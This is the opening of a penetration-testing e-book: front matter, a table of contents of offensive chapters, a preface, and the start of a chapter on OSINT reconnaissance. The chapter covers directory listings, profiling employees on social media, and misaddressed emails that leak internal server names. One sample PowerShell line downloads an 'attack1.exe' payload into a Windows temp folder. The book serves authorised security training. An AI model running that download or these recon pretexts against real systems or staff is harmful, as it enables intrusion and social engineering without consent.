Windows and Linux Penetration Testing from Scratch - Phil Bramwell - E-Book

Description

Let’s be honest—security testing can get repetitive. If you’re ready to break out of the routine and embrace the art of penetration testing, this book will help you to distinguish yourself to your clients.
This pen testing book is your guide to learning advanced techniques to attack Windows and Linux environments from the indispensable platform, Kali Linux. You'll work through core network hacking concepts and advanced exploitation techniques that leverage both technical and human factors to maximize success. You’ll also explore how to leverage public resources to learn more about your target, discover potential targets, analyze them, and gain a foothold using a variety of exploitation techniques while dodging defenses like antivirus and firewalls. The book focuses on leveraging target resources, such as PowerShell, to execute powerful and difficult-to-detect attacks. Along the way, you’ll enjoy reading about how these methods work so that you walk away with the necessary knowledge to explain your findings to clients from all backgrounds. Wrapping up with post-exploitation strategies, you’ll be able to go deeper and keep your access.
By the end of this book, you'll be well-versed in identifying vulnerabilities within your clients’ environments and providing the necessary insight for proper remediation.


Page count: 608

Year of publication: 2022




Windows and Linux Penetration Testing from Scratch

Second Edition

Harness the power of pen testing with Kali Linux for unbeatable hard-hitting results

Phil Bramwell

BIRMINGHAM—MUMBAI

Copyright © 2022 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Group Product Manager: Vijin Boricha

Publishing Product Manager: Vijin Boricha

Senior Editor: Arun Nadar

Content Development Editor: Sujata Tripathi

Technical Editor: Nithik Cheruvakodan

Copy Editor: Safis Editing

Project Coordinator: Ashwin Dinesh Kharwa

Proofreader: Safis Editing

Indexer: Sejal Dsilva

Production Designer: Vijay Kamble

Senior Marketing Coordinator: Hemangi Lotlikar

First published: July 2018

Second edition: September 2022

Production reference: 1030822

Published by Packt Publishing Ltd.

Livery Place

35 Livery Street

Birmingham

B3 2PB, UK.

ISBN 978-1-80181-512-3

www.packt.com

Dedicated to Sonya, Lenna, Sasha, and my children, Vera and Natan. Your unwavering support is the only reason this became possible.

For Mom, Dad, Rich, and Alex, who all somehow found a way to tolerate me all of these years.

And for every colleague along the way, from Kalamazoo to San Luis Obispo to NYC to Jerusalem and back – you kept me smiling and challenged me to keep this adventure going. Thank you.

Contributors

About the author

Phil Bramwell, CISSP has been tinkering with gadgets since he was a kid in the 1980s. After obtaining the Certified Ethical Hacker and Certified Expert Penetration Tester certifications in 2004 and a Bachelor of Applied Science in computer and information security from Davenport University in 2007, Phil was a security engineer and consultant who conducted Common Criteria, FIPS, and PCI-DSS assessments, GDPR consulting for a firm in the UK, and social engineering and penetration testing for banks, governments, and universities throughout the US. After specializing in antimalware analysis and cybersecurity operations, Phil is now a penetration tester for a Fortune 100 automobile manufacturer. Phil is based in the Metro Detroit area.

About the reviewer

Paolo Stagno (aka VoidSec) has worked as a penetration tester for a wide range of clients across top-tier international banks, major tech companies, and various Fortune 1000 industries. He has been responsible for discovering and exploiting new unknown vulnerabilities in applications, network infrastructure components, IoT devices, protocols, and technologies of multiple vendors and tech giants. He is now a freelance vulnerability researcher and exploit developer focused on Windows offensive application security (kernel and user-land). He enjoys understanding the digital world we live in by disassembling, reverse engineering, and exploiting complex products and code.

To my partner, Chiara, “my early muir owl,” for her continued support and encouragement with everything that I do. You have always pushed me towards new adventures, accomplishing my goals, and doing what is right; I love you.

Table of Contents

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the color images

Conventions used

Get in touch

Share Your Thoughts

Part 1: Recon and Exploitation

Chapter 1: Open Source Intelligence

Technical requirements

Hiding in plain sight – OSINT and passive recon

Walking right in – what the target intends to show the world

Just browsing, thanks – stepping into the target’s environment

I know a guy – services doing the probing for you

The world of Shodan

Shodan search filters

Google’s dark side

Google’s advanced operators

The Advanced Search page

Thinking like a dark Googler

Diving into OSINT with Kali

The OSINT analysis tools folder

Transforming your perspective – Maltego

Entities and transforms and graphs, oh my

OSINT with Spiderfoot

Summary

Questions

Chapter 2: Bypassing Network Access Control

Technical requirements

Bypassing media access control filtering – considerations for the physical assessor

Configuring a Kali wireless access point to bypass MAC filtering

Design weaknesses – exploiting weak authentication mechanisms

Capturing captive portal authentication conversations in the clear

Layer-2 attacks against the network

Bypassing validation checks

Confirming the organizationally unique identifier

Passive operating system fingerprinter

Spoofing the HTTP user agent

Breaking out of jail – masquerading the stack

Following the rules spoils the fun – suppressing normal TCP replies

Fabricating the handshake with Scapy and Python

Summary

Questions

Further reading

Chapter 3: Sniffing and Spoofing

Technical requirements

Advanced Wireshark – going beyond simple captures

Passive wireless analysis

Targeting WLANs with the Aircrack-ng suite

WLAN analysis with Wireshark

Active network analysis with Wireshark

Advanced Ettercap – the man-in-the-middle Swiss Army Knife

Bridged sniffing and the malicious access point

Ettercap filters – fine-tuning your analysis

Getting better – scanning, sniffing, and spoofing with BetterCAP

Summary

Questions

Further reading

Chapter 4: Windows Passwords on the Network

Technical requirements

Understanding Windows passwords

A crash course on hash algorithms

Password hashing methods in Windows

If it ends with 1404EE, then it’s easy for me – understanding LM hash flaws

Authenticating over the network – a different game altogether

Capturing Windows passwords on the network

A real-world pen test scenario – the chatty printer

Configuring our SMB listener

Authentication capture

Hash capture with LLMNR/NetBIOS NS spoofing

Let it rip – cracking Windows hashes

The two philosophies of password cracking

John the Ripper cracking with a wordlist

John the Ripper cracking with masking

Reviewing your progress with the show flag

Here, kitty kitty – getting started with Hashcat

Summary

Questions

Further reading

Chapter 5: Assessing Network Security

Technical requirements

Network probing with Nmap

Host discovery

Port scanning – scan types

Port scanning – port states

Firewall/IDS evasion, spoofing, and performance

Service and OS detection

Hands-on with Nmap

Integrating Nmap with Metasploit Console

Exploring binary injection with BetterCAP

The magic of download hijacking

Smuggling data – dodging firewalls with HTTPTunnel

IPv6 for hackers

IPv6 addressing basics

Watch me neigh neigh – local IPv6 recon and the Neighbor Discovery Protocol

IPv6 man-in-the-middle – attacking your neighbors

Living in an IPv4 world – creating a local 4-to-6 proxy for your tools

Summary

Questions

Further reading

Chapter 6: Cryptography and the Penetration Tester

Technical requirements

Flipping the bit – integrity attacks against CBC algorithms

Block ciphers and modes of operation

Introducing block chaining

Setting up your bit-flipping lab

Manipulating the IV to generate predictable results

Flipping to root – privilege escalation via CBC bit-flipping

Sneaking your data in – hash length extension attacks

Setting up your hash attack lab

Understanding SHA-1’s running state and compression function

Data injection with the hash length extension attack

Busting the padding oracle with PadBuster

Interrogating the padding oracle

Decrypting a CBC block with PadBuster

Behind the scenes of the oracle padding attack

Summary

Questions

Chapter 7: Advanced Exploitation with Metasploit

Technical requirements

How to get it right the first time – generating payloads

Installing Wine32 and Shellter

Payload generation goes solo – working with msfvenom

Creating nested payloads

Helter skelter – evading antivirus with Shellter

Modules – the bread and butter of Metasploit

Building a simple Metasploit auxiliary module

Efficiency and attack organization with Armitage

Getting familiar with your Armitage environment

Enumeration with Armitage

Exploitation made ridiculously simple with Armitage

A word about Armitage and the pen tester mentality

Social engineering attacks with Metasploit payloads

Creating a Trojan with Shellter

Preparing a malicious USB drive for Trojan delivery

Summary

Questions

Further reading

Part 2: Vulnerability Fundamentals

Chapter 8: Python Fundamentals

Technical requirements

Incorporating Python into your work

Why Python?

Getting cozy with Python in your Kali environment

Introducing Vim with Python syntax awareness

Network analysis with Python modules

Python modules for networking

Building a Python client

Building a Python server

Building a Python reverse-shell script

Antimalware evasion in Python

Creating Windows executables of your Python scripts

Preparing your raw payload

Writing your payload retrieval and delivery in Python

Python and Scapy – a classy pair

Revisiting ARP poisoning with Python and Scapy

Summary

Questions

Further reading

Chapter 9: PowerShell Fundamentals

Technical requirements

Power to the shell – PowerShell fundamentals

What is PowerShell?

PowerShell’s cmdlets and the PowerShell scripting language

Working with the Windows Registry

Pipelines and loops in PowerShell

It gets better – PowerShell’s ISE

Post-exploitation with PowerShell

ICMP enumeration from a pivot point with PowerShell

PowerShell as a TCP-connect port scanner

Delivering a Trojan to your target via PowerShell

Encoding and decoding binaries in PowerShell

Offensive PowerShell – introducing the Empire framework

Installing and introducing PowerShell Empire

Configuring listeners

Configuring stagers

Your inside guy – working with agents

Configuring a module for agent tasking

Summary

Questions

Further reading

Chapter 10: Shellcoding – The Stack

Technical requirements

An introduction to debugging

Understanding the stack

Understanding registers

Assembly language basics

Disassemblers, debuggers, and decompilers – oh my!

Getting cozy with the Linux command-line debugger – GDB

Stack smack – introducing buffer overflows

Examining the stack and registers during execution

Lilliputian concerns – understanding endianness 

Introducing shellcoding

Hunting bytes that break shellcode

Generating shellcode with msfvenom

Grab your mittens, we’re going NOP sledding

Summary

Questions

Further reading

Chapter 11: Shellcoding – Bypassing Protections

Technical requirements

DEP and ASLR – the intentional and the unavoidable

Understanding DEP

Understanding ASLR

Demonstrating ASLR on Kali Linux with C

Introducing ROP

Borrowing chunks and returning to libc – turning the code against itself

The basic unit of ROP – gadgets

Getting cozy with our tools – MSFrop and ROPgadget

Creating our vulnerable C program without disabling the protections

No PIE for you – compiling your vulnerable executable without ASLR hardening

Generating an ROP chain

Getting hands-on with the return-to-PLT attack

Extracting gadget information for building your payload

Go, go, gadget ROP chain – bringing it together for the exploit

Summary

Questions

Further reading

Chapter 12: Shellcoding – Evading Antivirus

Technical requirements

Living off the land with PowerShell

Injecting Shellcode into interpreter memory

Getting sassy – on-the-fly LSASS memory dumping with PowerShell

Staying flexible – tweaking the scripts

Understanding Metasploit shellcode delivery

Encoder theory and techniques – what encoding is and isn’t

Windows binary disassembly within Kali

Injection with Backdoor Factory

Time travel with your Python installation – using PyEnv

Installing BDF

Code injection fundamentals – fine-tuning with BDF

Trojan engineering with BDF and IDA

Summary

Questions

Chapter 13: Windows Kernel Security

Technical requirements

Kernel fundamentals – understanding how kernel attacks work

Kernel attack vectors

The kernel’s role as a time cop

It’s just a program

Pointing out the problem – pointer issues

Dereferencing pointers in C and assembly

Understanding NULL pointer dereferencing

The Win32k kernel-mode driver

Passing an error code as a pointer to xxxSendMessage()

Metasploit – exploring a Windows kernel exploit module

Practical kernel attacks with Kali

An introduction to privilege escalation

Escalating to SYSTEM on Windows 7 with Metasploit

Summary

Questions

Further reading

Chapter 14: Fuzzing Techniques

Technical requirements

Network fuzzing – mutation fuzzing with Taof proxying

Configuring the Taof proxy to target the remote service

Fuzzing by proxy – generating legitimate traffic

Hands-on fuzzing with Kali and Python

Picking up where Taof left off with Python – fuzzing the vulnerable FTP server

Exploring with boofuzz

Impress your teachers – using boofuzz grammar

The other side – fuzzing a vulnerable FTP client

Writing a bare-bones FTP fuzzer service in Python

Crashing the target with the Python fuzzer

Fuzzy registers – the low-level perspective

Calculating the EIP offset with the Metasploit toolset

Shellcode algebra – turning the fuzzing data into an exploit

Summary

Questions

Further reading

Part 3: Post-Exploitation

Chapter 15: Going Beyond the Foothold

Technical requirements

Gathering goodies – enumeration with post modules

ARP enumeration with Meterpreter

Forensic analysis with Meterpreter – stealing deleted files

Internet Explorer enumeration – discovering internal web resources

Network pivoting with Metasploit

Just a quick review of subnetting

Launching Metasploit into the hidden network with autoroute

Escalating your pivot – passing attacks down the line

Using your captured goodies

Quit stalling and Pass-the-Hash – exploiting password equivalents in Windows

Summary

Questions

Further reading

Chapter 16: Escalating Privileges

Technical requirements

Climbing the ladder with Armitage

Named pipes and security contexts

Impersonating the security context of a pipe client

Superfluous pipes and pipe creation race conditions

Moving past the foothold with Armitage

Armitage pivoting

When the easy way fails – local exploits

Kernel pool overflow and the danger of data types

Let’s get lazy – Schlamperei privilege escalation on Windows 7

Escalation with WMIC and PS Empire

Quietly spawning processes with WMIC

Creating a PowerShell Empire agent with remote WMIC

Escalating your agent to SYSTEM via access token theft

Dancing in the shadows – looting domain controllers with vssadmin

Extracting the NTDS database and SYSTEM hive from a shadow copy

Exfiltration across the network with cifs

Password hash extraction with libesedb and ntdsxtract

Summary

Questions

Further reading

Chapter 17: Maintaining Access

Technical requirements

Persistence with Metasploit and PowerShell Empire

Creating a payload for the Metasploit persister

Configuring the Metasploit persistence module and firing away

Verifying your persistent Meterpreter backdoor

Not to be outdone – persistence in PowerShell Empire

Elevating the security context of our Empire agent

Creating a WMI subscription for stealthy persistence of your agent

Verifying agent persistence

Hack tunnels – netcat backdoors on the fly

Uploading and configuring persistent netcat with Meterpreter

Remotely tweaking Windows Firewall to allow inbound netcat connections

Verifying persistence is established

Maintaining access with PowerSploit

Installing the persistence module in PowerShell

Configuring and executing Meterpreter persistence

Lying in wait – verifying persistence

Summary

Questions

Further reading

Answers

Other Books You May Enjoy

Preface

Maybe you’ve just finished a boot camp on ethical hacking and you can’t get enough. Perhaps you’re an administrator who has realized that it’s time to understand how the bad guys work with these dark arts. It’s also possible that someone gave you this book for your birthday after misunderstanding when you said you have a keen interest in den nesting. Whoever you are (except for that last one), this book is for you. But why this book?

Let’s be honest: this subject has a tendency to be dry. Sometimes, it feels like an author is there to just tell us how it is, providing a sparse foundation of the concepts under discussion. I think the experience is more enjoyable if it feels more like an interactive learning session than a lecture. So, I’ve endeavored to discuss pen testing in a more conversational and relaxed manner. Reading this book should feel like we’re just hanging out in the lab and exploring these concepts. I think the kids these days call this vibing. I’ll have to ask my nieces.

This book isn’t intended for complete beginners, but it is accessible to different levels of experience. Overall, it is assumed that you have some experience and education in information technology and cybersecurity. This book won’t “teach you how to hack,” and in fact, many of the labs feature old attacks that aren’t likely to succeed in a real-world environment. The foundation they all provide, however, is very much still relevant. The lessons will be valuable to those who intend to understand how the core concept works, and from there, they can be translated into modern attacks. This book emphasizes understanding over blindly following steps.

Who this book is for

This book is for penetration testers, IT professionals, and individuals breaking into the pen testing role after demonstrating an advanced skill in boot camps. Prior experience with Windows, Linux, and networking is useful.

What this book covers

Chapter 1, Open Source Intelligence, provides a look at how to use publicly available resources such as Google to gather surprisingly useful information about a target.

Chapter 2, Bypassing Network Access Control, examines how network access is sometimes controlled based on how a system “appears,” and how we can tweak that appearance.

Chapter 3, Sniffing and Spoofing, explores the world of intercepting data off the wire (or out of the air) and manipulating data on the fly.

Chapter 4, Windows Passwords on the Network, reviews how Windows manages passwords during authentication over the network and how to intercept these attempts.

Chapter 5, Assessing Network Security, provides a crash course in network analysis and vulnerability assessment with Nmap, further covering intercepting data to inject our own in its place, and providing a review of IPv6 in today’s still-IPv4-dominant world.

Chapter 6, Cryptography and the Penetration Tester, looks at attacks that exploit weaknesses in cryptographic implementations.

Chapter 7, Advanced Exploitation with Metasploit, dives into the inner workings of Metasploit, as well as how to use Metasploit-generated payloads with other excellent tools, such as Shellter.

Chapter 8, Python Fundamentals, provides a crash course in Python from a pen tester’s perspective. This foundation is useful later in the book.

Chapter 9, PowerShell Fundamentals, also provides a crash course in a scripting language: PowerShell. This foundation is also useful in later labs.

Chapter 10, Shellcoding – The Stack, provides a review of how the stack works and how it can be manipulated.

Chapter 11, Shellcoding – Bypassing Protections, jumping off from the stack foundation in Chapter 10, Shellcoding – The Stack, explores how defenders have responded and how attacks such as return-oriented programming had to adapt to these responses.

Chapter 12, Shellcoding – Evading Antivirus, explores how antimalware can be confused when we live off the land with PowerShell, and an alternative to Shellter’s dynamic injection approach: cave jumping.

Chapter 13, Windows Kernel Security, provides a foundation in how kernel weaknesses are found and an exploration of real-world examples.

Chapter 14, Fuzzing Techniques, provides a practical review of the fuzzing methodology and how to inform exploit development with the results.

Chapter 15, Going Beyond the Foothold, looks at the first steps after we finally establish our initial foothold in our target, including how to conduct recon and further attacks from that privileged position.

Chapter 16, Escalating Privileges, provides a more in-depth look at how we can escalate privileges locally with Metasploit, as well as finding and using passwords – even when we don’t know what the password is.

Chapter 17, Maintaining Access, takes a look at how we can persist once we’ve made it inside the target environment, both from scratch with the target’s built-in abilities and with specialized tools for building reboot-resistant access.

Answers provides the answers to the quizzes at the end of each chapter so that you can check your knowledge.

To get the most out of this book

The intent of this book is to emphasize Kali’s off-the-shelf capabilities as much as possible. Many commercial products are not mentioned, or if they are mentioned, free alternatives are reviewed in the labs (e.g., the free version of Shellter versus Shellter Pro). Today’s professional penetration tester has a wealth of excellent commercial tools in their toolset, but you can be an effective pen tester with what’s already freely available. Per The Hacker Manifesto, this was our intention with these discussions.

The version of Kali Linux used in this book is 2021.1; however, closer to the publishing date, I reviewed the labs with 2022.1 and found no issues. The processor and stack discussions assume a 32-bit operating system.

Kali Linux is free to download. However, Windows is a paid operating system. Thankfully, Microsoft provides evaluation copies of Windows Server and Edge developer copies of Windows 7 and 10; these were used as Windows targets in the labs.

The virtualization used was VMware Workstation, which is paid software. You can build comparable environments with the freeware Oracle VirtualBox.

The evaluation copy of Windows Server can be downloaded from https://www.microsoft.com/en-us/evalcenter/download-windows-server-2016.

The developer copies of Windows 7 or 10 can be downloaded from https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/.

Download the color images

We also provide a PDF file that has color images of the screenshots and diagrams used in this book. You can download it here: https://packt.link/7UGEZ.

Conventions used

There are a number of text conventions used throughout this book.

Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: “You can also use from [module] import to pick and choose the attributes you need.”

A block of code is set as follows:

11000000.10101000.01101001.00000000          Network           Hosts

When we wish to draw your attention to a particular part of a code block, the relevant lines or items are set in bold:

11111111.11111111.11100000.00000000   255     255      224       0

Any command-line input or output is written as follows:

> (New-Object System.Net.WebClient).DownloadFile(“http://192.168.63.143/attack1.exe”, “c:\windows\temp\attack1.exe”)

Bold: Indicates a new term, an important word, or words that you see onscreen. For instance, words in menus or dialog boxes appear in bold. Here is an example: “Navigate to Hosts | Nmap Scan | Quick Scan (OS detect).”

Tips or Important Notes

Appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, email us at [email protected] and mention the book title in the subject of your message.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata and fill in the form.

Piracy: If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Share Your Thoughts

Once you’ve read Windows and Linux Penetration Testing from Scratch, we’d love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback.

Your review is important to us and the tech community and will help us make sure we’re delivering excellent quality content.

Part 1: Recon and Exploitation

In this section, we will first explore open source intelligence (OSINT) concepts. We’ll then move on to networking. By the end of this section, you will be able to conduct sophisticated spoofing and footprinting techniques to understand the network and thus inform efforts to exploit targets.

This part of the book comprises the following chapters:

Chapter 1, Open Source Intelligence

Chapter 2, Bypassing Network Access Control

Chapter 3, Sniffing and Spoofing

Chapter 4, Windows Passwords on the Network

Chapter 5, Assessing Network Security

Chapter 6, Cryptography and the Penetration Tester

Chapter 7, Advanced Exploitation with Metasploit

Chapter 1: Open Source Intelligence

What separates penetration testing (pen testing) from hacking of the illegal variety? The simple answer is permission, but how do you define this? Asking for a pen test does not mean an open invitation to hack to your heart’s content. I know of at least one pen testing organization that found itself in legal trouble for touching a server that was not supposed to be part of the test. Which systems you may touch is part of the scope of the pen test, and it is defined in the planning phase of the engagement. Its importance can’t be overstated. However, this is a hands-on technical book – we won’t be covering scoping and engagement letters here.

Now, you’re double-checking the name of the chapter to make sure you’re in the right place. Is this not about open source intel, you wonder? Indeed, it is, and I mention scope because open source intelligence (OSINT) is an area where you need not worry about the frustration of a skinny scope. Open source means the information is already out in the open, ready for your retrieval. You only need to know the tips and tricks needed to step beyond the run-of-the-mill Google user. In this chapter, we’ll define OSINT more carefully – we’ll learn how to take advantage of Google’s sophisticated features to dig deep enough to surprise your client before you’ve sent a single packet to their network, and we’ll introduce how Kali functions as your OSINT sidekick. We’ll cover this and more in the following topics:

Hiding in plain sight – OSINT and passive recon

The world of Shodan

Google’s dark side

Diving into OSINT with Kali

Technical requirements

You’ll need a virtual machine (VM) or standalone PC running Kali Linux. We’ll run our demonstrations on Kali 2021.1, but the first section can be completed on any internet-connected computer.

Hiding in plain sight – OSINT and passive recon

We’ll be making heavy use of Kali Linux throughout this book, but some of the most important work you’ll do for many clients can be done from any device, regardless of a specialized toolset. You might be waiting in line at Starbucks with your personal smartphone, punching in some slick Google queries, and bam – you have a surprising head start before you’ve even arrived at your desk. Then, you sit down at Kali and spend half an hour digging up even more, and you haven’t sent a single packet across the wire to your target. But now, I can hear you at the back: You've said "OSINT" and "passive recon" — is there a difference? That’s a good question, with an annoying answer: It depends on whom you ask. These terms are often used synonymously, but the important distinction is where you’re sending your packets:

With pure passive reconnaissance, your packets are going to a myriad of resources that are available on the public internet to anyone willing to ask. But they are not going to your target’s network. This can also mean that you aren’t sending any packets at all – you’re merely listening, as we do with wardriving.

OSINT can mean both this purely passive task where no contact is made with your target and using your target’s resources that are explicitly meant for public use. Does your target allow a potential customer to create a free account? It behooves the pen tester to create an account as a potential customer would, but this probably means you’re directly communicating with your target’s network. The “meant for public use” part is what makes it OSINT.

Sounds like a pretty important distinction, right? The reason why they’re often treated as the same thing is that they both fall under the umbrella of a black box – our experience with the environment is like that of an ordinary outsider, as opposed to a white box, where, as pen testers, we fully understand the inner workings of the environment and we’re informing our efforts accordingly (of course, we can conduct our testing with only partial knowledge of the environment, which will be a blend of black and white, or a gray box).

We’re touching on pen testing philosophy at this point – how realistic is the test in representing a real-world potential attack? Those of us who are passionate about security stand by Shannon's Maxim: we should always assume that the enemy will have full knowledge of how our system works. A real-world enemy will have scoured the internet for any tidbits about their target. A real-world enemy will have created accounts with the target’s services and spent a considerable amount of time gaining the same level of familiarity as any old hand. That being said, your client may need to understand how their environment works from different perspectives, and you might very well be prohibited from using information gained from the view of a registered user. Another consideration is time – you will be operating on a schedule, and you don’t want to put the other phases of the assessment in a crunch.

Walking right in – what the target intends to show the world

The nature of your target will tell you how much is meant to be shown to the world. For example, if your target is a bank, then they will provide comprehensive resources for both their current customers and in their efforts to attract new account holders. Even a more private entity needs to put themselves out there in some regard (for example, a private network that needs to be remotely accessed). There’s an old saying in computer security: the most secure computer is sealed in a concrete box and sits on the ocean floor. If no one can actually use the computer, it seems like a waste of concrete, and so our clients will host services and websites anyway.

Examining the target’s websites

One of the first things I do with a target is browse their website and View page source. This screenshot shows how to grab it in Microsoft Edge, but right-clicking on a page will bring up the option in any of the major browsers:

Figure 1.1 – The right-click menu while viewing a page in Microsoft Edge

This option will open a new tab and display the HTML source for the page. Often, this won’t reveal anything that isn’t already visible (it is a markup language, after all). But there may be comments in the source and other treats not intended to be displayed by the browser, and these can give us morsels of information about our target that will inform our attack.
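If you have saved a copy of the page source, the hunt for comments and resource paths can be sketched in a few lines of Python. This is a minimal sketch using only the standard library; the class name SourceScout and the sample HTML are invented for illustration and do not come from any real client.

```python
from html.parser import HTMLParser


class SourceScout(HTMLParser):
    """Collect HTML comments and script/stylesheet paths from page source."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.resources = []

    def handle_comment(self, data):
        # Comments are never rendered, so notes left by developers end up here.
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        # Record where scripts and stylesheets are loaded from.
        for name, value in attrs:
            if tag == "script" and name == "src" and value:
                self.resources.append(value)
            elif tag == "link" and name == "href" and value:
                self.resources.append(value)


# Hypothetical page source, invented for this example.
SAMPLE = """
<html><head>
<title>Your Client</title>
<!-- TODO: remove staging login before launch -->
<script src="/assets/js/main.js"></script>
<link rel="stylesheet" href="/assets/css/site.css">
</head><body><p>Welcome!</p></body></html>
"""

scout = SourceScout()
scout.feed(SAMPLE)

# Top-level folders referenced by the page are worth a manual visit.
folders = sorted({path.split("/")[1] for path in scout.resources if path.startswith("/")})

print(scout.comments)
print(scout.resources)
print(folders)
```

The parser works on text you already have, so running it sends nothing to the target.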

With this client, the page source revealed a folder called assets:

Figure 1.2 – Examining the page source in Microsoft Edge

We see references to scripts that can be found on the host under the assets folder. So, just drop this into your address bar and see what happens – http://www.your-client.com/assets:

Figure 1.3 – The result of manually typing in the assets URL

We haven’t even done anything yet – just pulled up the public site in an ordinary browser – but we see this host is telling us a couple of things:

It’s an Apache server, version 2.4.41, running on Unix (or Unix-like).

It wasn’t configured in the most secure manner.

That second point is the most important observation. Does revealing the server version like this really matter that much? Sure, it gives us a heads-up for our research, but it’s not exactly a welcome mat either. What it tells us about is the administrator’s general approach to operational security. The kind of server administrator who either doesn’t know or doesn’t care about the risk, regardless of how tiny, is more likely to be the kind of administrator who, for example, asks people in public forums for help with some new hardware at work, even providing logs that you’d be lucky to get during the assessment.
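For note-taking, the version string from a listing like this can be pulled apart automatically. The following is a minimal sketch; the footer text is an assumption modeled on the Apache 2.4.41 on Unix observation above (the port in it is made up), and parse_signature is a hypothetical helper name.

```python
import re

# Matches signatures such as "Apache/2.4.41 (Unix)"; the platform part is optional.
SIGNATURE = re.compile(
    r"(?P<product>[A-Za-z][\w\-]*)/(?P<version>\d+(?:\.\d+)*)"
    r"(?:\s+\((?P<platform>[^)]*)\))?"
)


def parse_signature(text):
    """Return product, version, and platform from a server signature, or None."""
    match = SIGNATURE.search(text)
    if match is None:
        return None
    return match.groupdict()


# Assumed footer text, shaped like the signature line on a directory listing.
footer = "Apache/2.4.41 (Unix) Server at www.your-client.com Port 80"
print(parse_signature(footer))
```

A signature with no version at all returns None, which is itself worth writing down: it suggests someone took the time to trim what the server announces.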

Don’t be so antisocial – examining the target’s presence on social media

We live in funny times, when it seems like everyone and their grandparents are willingly sharing all their personal details with social media companies. Back in my day, you’d hear about the cool kids having a party at their parents’ house and you’d think, now that's the place to be on Friday night. Your target is hearing the same thing about social media today – everyone’s on Facebook, Twitter, Instagram, and TikTok, so that’s where you’re going to meet the cool kids (or potential customers, as the case may be). In this screenshot, we see how our target is encouraging engagement:

Figure 1.4 – Social media links on our target’s home page

You’re not likely to find juicy tidbits about your target from posts that they made on social media. You’re likely to find the good stuff from other users of the social media platform in question. For example, you click the Facebook button and end up on a page set up by your target. You browse the comments: Jane is the GM at the Highland branch and she was really responsive to my needs. Or maybe a photo from a company picnic with 14 likes, and one of the likes is Jane’s, and she loves to share pictures of her pets, kids, car, home, and her favorite latte at Starbucks over on her profile page.

I probably sound like a ranting lunatic (I am, but that’s not important right now), but the point is to soak up all of this information and take good notes. We’re in the first chapter of the book, discussing what will probably be chapter one of your assessment with a client. That Jane named her dog Mr. Scruffles might seem useless, until day four, when you’re prompted with the security question for pet's name. Also consider that Jane’s IT guy, Dave, is a member of a popular Facebook group for IT admins to vent about their jobs; Dave just had a hard day working with your client’s Cisco appliances and he’s ready to upload a diagnostic file.

Tread carefully!

We’re looking for information that’s already there. Do not attempt to communicate with any of the individuals you find during your social media searches, unless you’re conducting a social engineering assessment – this would most certainly not be passive!

Just browsing, thanks – stepping into the target’s environment

Wait a sec. Stepping into the target’s environment? Now I know I'm in the wrong chapter, you think. Indeed, this is where passive recon starts to blend into the broader term OSINT. The keyword so far has been passive – listening from the sidelines or taking a peek in the proverbial windows as we drive by. Now, the keywords are open source – we’re taking a look at things that are meant to be out in the open. We’re going to start getting a little braver with our efforts. Instead of figuratively driving by, we’ll park and walk into the shop and look around. It’s a door for the public and it says Open on the front, so we haven’t stepped outside the realm of open source. Sometimes, however, we can get interesting information about what’s going on behind the counter of our metaphorical shop.

Summoning the daemon – the fat-fingered email address

We’ve all misspelled someone’s name at some point. Perhaps you’re trying to send an email to the administrator of a domain and, gosh darn it, you misspelled administrator. Oh, these pesky fingers of mine. As my mother-in-law would say, schlimazel (an unlucky or clumsy person). Let’s take a look at our outgoing email:

Figure 1.5 – The header from our sent probe email

The point is to send an email to the target domain but to a recipient we know doesn’t exist. You could very well let your cat walk across the keyboard and use that as the recipient – the result would be the same. However, there’s a bit of a social engineering angle going on here. Just in case someone is reviewing these, my message is more likely to look like a legitimate attempt to communicate with the business or government agency. A smashed-keyboard email address and message body will look like a deliberate attempt to provoke a response. Bonus points if you actually do engage in a friendly conversation posing as a customer, but just let one of your messages have a fat-fingered recipient address. By sending an email to a nonexistent email address, we provoke a bounce message. Unlike sending an email to a nonexistent domain, only the target environment is going to know whether or not the user exists. The bounce will come from the target environment and often contains troubleshooting information with tasty tidbits for us fledgling hackers. Let’s take a peek at the non-delivery report from our client:

Figure 1.6 – The header from the bounce message

My favorite part of this bounce message is Diagnostic information for administrators. Golly, that sure is helpful of you, thank you!

I said this earlier, and it should be a mantra throughout the OSINT phase: this isn't exactly a welcome mat. It isn’t the keys to the kingdom, and this isn’t a movie – no amount of furious typing is going to change our position in the assessment. But let’s take a look at what we learned, step by step:

The server that generated this report is ME-VM-MBX02 and its IP address is 10.255.134.142. It’s reasonable to guess that this is a virtual machine, as the VM initialism is often incorporated into internal naming conventions by IT folks. It makes it easier to determine what troubleshooting may entail, at a glance.

The server that passed on this information to ME-VM-MBX02, our report-generating server, is ME-VM-CAS02, and its IP addresses are 10.255.134.140 and 10.255.27.36.

The server that passed this information on to the CAS02 host is ME-VM-MAILGW01 and its IP address is 10.255.134.160. GW probably means gateway.

Hopefully, you have already picked up on the important part. That’s right – those are ten-dot addresses. As a refresher, addresses in the 10.0.0.0/8 block are reserved as private address space as defined by the Internet Assigned Numbers Authority (IANA) (refer to them as ten-dot or ten slash eight and you’ll be one of the cool kids). Addresses in the 10.0.0.0/8 block are not publicly routable, so why do we care, as uninformed outsiders? We’re clearly getting information from behind the perimeter. What else did we notice? Examine this line:

Microsoft SMTP Server (TLS) id 15.0.1497.2

